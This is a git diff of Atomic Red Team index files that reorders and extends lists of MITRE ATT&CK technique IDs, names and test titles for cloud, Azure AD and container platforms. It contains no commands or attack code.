diff --git a/atomics/Indexes/Indexes-CSV/google-workspace-index.csv b/atomics/Indexes/Indexes-CSV/google-workspace-index.csv
index ed6fcb665a..2d5c9e12e3 100644
--- a/atomics/Indexes/Indexes-CSV/google-workspace-index.csv
+++ b/atomics/Indexes/Indexes-CSV/google-workspace-index.csv
@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
 defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
-privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
diff --git a/atomics/Indexes/Indexes-CSV/iaas-index.csv b/atomics/Indexes/Indexes-CSV/iaas-index.csv
index 52ecf3e5c1..5e12c0b39c 100644
--- a/atomics/Indexes/Indexes-CSV/iaas-index.csv
+++ b/atomics/Indexes/Indexes-CSV/iaas-index.csv
@@ -14,6 +14,7 @@ defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom I
 credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
 credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
 credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
+credential-access,T1528,Steal Application Access Token,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
 impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
 discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
 discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/azure-ad-index.md b/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
index 3b10dfb977..55ab503b57 100644
--- a/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
+++ b/atomics/Indexes/Indexes-Markdown/azure-ad-index.md
@@ -21,26 +21,20 @@
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# impact
-- T1498.001 Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.003 Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.004 Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498.002 Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499.002 Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
 # discovery
 - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1201 Password Policy Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
 # defense-evasion
 - [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
   - Atomic Test #1: Add Federation to Azure AD [azure-ad]
+- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -49,6 +43,7 @@
 - T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.008 Impair Defenses: Disable Cloud Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.009 Conditional Access Policies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.010 Masquerade Account Name [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -75,6 +70,16 @@
 - T1484 Domain or Tenant Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
+# initial-access
+- T1566.002 Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1566.004 Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
 # persistence
 - [T1098.003 Account Manipulation: Additional Cloud Roles](../../T1098.003/T1098.003.md)
   - Atomic Test #1: Azure AD - Add Company Administrator Role to a user [azure-ad]
@@ -99,16 +104,12 @@
 - T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
-# execution
-- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
-# initial-access
-- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1078.004 Valid Accounts: Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-
 # lateral-movement
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1021.007 Cloud Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 
+# execution
+- T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+
diff --git a/atomics/Indexes/Indexes-Markdown/containers-index.md b/atomics/Indexes/Indexes-Markdown/containers-index.md
index a96db1cf68..deb2614a7b 100644
--- a/atomics/Indexes/Indexes-Markdown/containers-index.md
+++ b/atomics/Indexes/Indexes-Markdown/containers-index.md
@@ -1,102 +1,620 @@
 # Containers Atomic Tests by ATT&CK Tactic & Technique
-# discovery
-- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
-  - Atomic Test #1: Docker Container and Resource Discovery [containers]
-  - Atomic Test #2: Podman Container and Resource Discovery [containers]
-- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1046 Network Service Discovery](../../T1046/T1046.md)
-  - Atomic Test #9: Network Service Discovery for Containers [containers]
-
-# credential-access
-- T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110.003 Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1552.001 Unsecured Credentials: Credentials In Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1528 Steal Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1110.004 Brute Force: Credential Stuffing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
-  - Atomic Test #1: List All Secrets [containers]
-  - Atomic Test #2: ListSecrets [containers]
-
-# persistence
-- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- [T1053.007 Kubernetes Cronjob](../../T1053.007/T1053.007.md)
-  - Atomic Test #1: ListCronjobs [containers]
-  - Atomic Test #2: CreateCronjob [containers]
-- T1098.006 Additional Container Cluster Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1525 Implant Internal Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+# defense-evasion
+- T1055.011 Process Injection: Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.011 Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.011 Signed Binary Proxy Execution: Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.009 Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.012 File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1216.001 Signed Script Proxy Execution: Pubprn [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1006 Direct Volume Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.008 Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.013 Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1014 Rootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.007 Masquerading: Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.001 Pre-OS Boot: System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.005 Masquerading: Match Legitimate Name or Location [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564 Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.001 Virtualization/Sandbox Evasion: System Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.007 Signed Binary Proxy Execution: Msiexec [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.002 Modify Authentication Process: Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.003 Indicator Removal on Host: Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1202 Indirect Command Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1140 Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562 Impair Defenses [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.003 Thread Execution Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036 Masquerading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.008 Email Collection: Mailbox Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218 Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.006 Indicator Removal on Host: Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1620 Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480.002 Mutual Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.011 Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.003 Signed Binary Proxy Execution: CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.002 Impair Defenses: Disable Windows Event Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.002 Signed Binary Proxy Execution: Control Panel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.004 Impair Defenses: Disable or Modify System Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.015 Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1207 Rogue Domain Controller [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.006 Subvert Trust Controls: Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1112 Modify Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.001 Obfuscated Files or Information: Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1484.001 Domain Policy Modification: Group Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136.001 Create Account: Local Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1543.005 Container Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.001 Indicator Removal on Host: Clear Windows Event Logs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.002 Create Process with Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.008 Signed Binary Proxy Execution: Odbcconf [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.006 Impair Defenses: Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1550.003 Use Alternate Authentication Material: Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.004 Masquerading: Masquerade Task or Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.004 Process Injection: Asynchronous Procedure Call [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.002 Process Injection: Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.010 Impair Defenses: Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.005 Signed Binary Proxy Execution: Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.001 Access Token Manipulation: Token Impersonation/Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.012 LNK Icon Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.003 Impair Defenses: Impair Command History Logging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.004 Access Token Manipulation: Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.001 Signed Binary Proxy Execution: Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1070.005 Indicator Removal on Host: Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.001 Impair Defenses: Disable or Modify Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1055.012 Process Injection: Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027 Obfuscated Files or Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.001 Invalid Code Signature [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.014 Polymorphic Code [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1134.005 Access Token Manipulation: SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.010 Signed Binary Proxy Execution: Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1036.003 Masquerading: Rename System Utilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1553.004 Subvert Trust Controls: Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1027.004 Obfuscated Files or Information: Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1197 BITS Jobs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1656 Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1127.002 ClickOnce [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
